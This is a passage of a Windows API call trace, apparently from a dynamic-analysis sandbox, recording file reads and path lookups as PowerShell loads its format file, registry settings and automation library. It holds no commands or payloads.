	[0477.195] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.196] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.196] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.198] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.198] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.198] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.198] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.198] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.198] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.199] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.199] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.199] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.199] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.199] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.200] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.200] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.200] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.200] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.200] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.200] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.200] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.201] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.201] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.201] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.201] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.201] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.201] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.201] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.202] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.202] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.202] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.202] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.202] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x1000, lpOverlapped=0x0) returned 1
	[0477.202] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0xf37, lpOverlapped=0x0) returned 1
	[0477.202] ReadFile (in: hFile=0x320, lpBuffer=0x3741917, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3741917*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0477.203] ReadFile (in: hFile=0x320, lpBuffer=0x3742278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed0d8, lpOverlapped=0x0 | out: lpBuffer=0x3742278*, lpNumberOfBytesRead=0x1ed0d8*=0x0, lpOverlapped=0x0) returned 1
	[0477.203] CloseHandle (hObject=0x320) returned 1
	[0477.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0477.203] SetErrorMode (uMode=0x1) returned 0x1
	[0477.203] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed080 | out: lpFileInformation=0x1ed080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0477.203] SetErrorMode (uMode=0x1) returned 0x1
	[0477.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0477.203] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed168 | out: phkResult=0x1ed168*=0x320) returned 0x0
	[0477.204] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0ec, lpData=0x0, lpcbData=0x1ed0e8*=0x0 | out: lpType=0x1ed0ec*=0x1, lpData=0x0, lpcbData=0x1ed0e8*=0x56) returned 0x0
	[0477.204] CoTaskMemAlloc (cb=0x5a) returned 0x4a6080
	[0477.204] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed0bc, lpData=0x4a6080, lpcbData=0x1ed0b8*=0x56 | out: lpType=0x1ed0bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed0b8*=0x56) returned 0x0
	[0477.204] CoTaskMemFree (pv=0x4a6080) 
	[0477.204] RegCloseKey (hKey=0x320) returned 0x0
	[0477.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0477.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0477.213] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x198addd7, Data2=0xa7fc, Data3=0x478c, Data4=([0]=0xaf, [1]=0xe, [2]=0x1, [3]=0xd8, [4]=0x4b, [5]=0x85, [6]=0xd9, [7]=0xa4))) returned 0x0
	[0477.213] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0x4b027319, Data2=0x21c5, Data3=0x47cb, Data4=([0]=0xaf, [1]=0x52, [2]=0x9, [3]=0x45, [4]=0x33, [5]=0xaf, [6]=0xf8, [7]=0xc7))) returned 0x0
	[0477.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.227] CoCreateGuid (in: pguid=0x1ed390 | out: pguid=0x1ed390*(Data1=0xbf8524ce, Data2=0x2758, Data3=0x4c4e, Data4=([0]=0x82, [1]=0x96, [2]=0xe8, [3]=0xaf, [4]=0x9f, [5]=0xe6, [6]=0x3e, [7]=0xc7))) returned 0x0
	[0477.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ebe70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.231] VirtualQuery (in: lpAddress=0x1eb3a0, lpBuffer=0x1ec260, dwLength=0x30 | out: lpBuffer=0x1ec260*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.232] VirtualQuery (in: lpAddress=0x1eb430, lpBuffer=0x1ec2f0, dwLength=0x30 | out: lpBuffer=0x1ec2f0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.233] VirtualQuery (in: lpAddress=0x1ebbb0, lpBuffer=0x1eca70, dwLength=0x30 | out: lpBuffer=0x1eca70*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0477.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
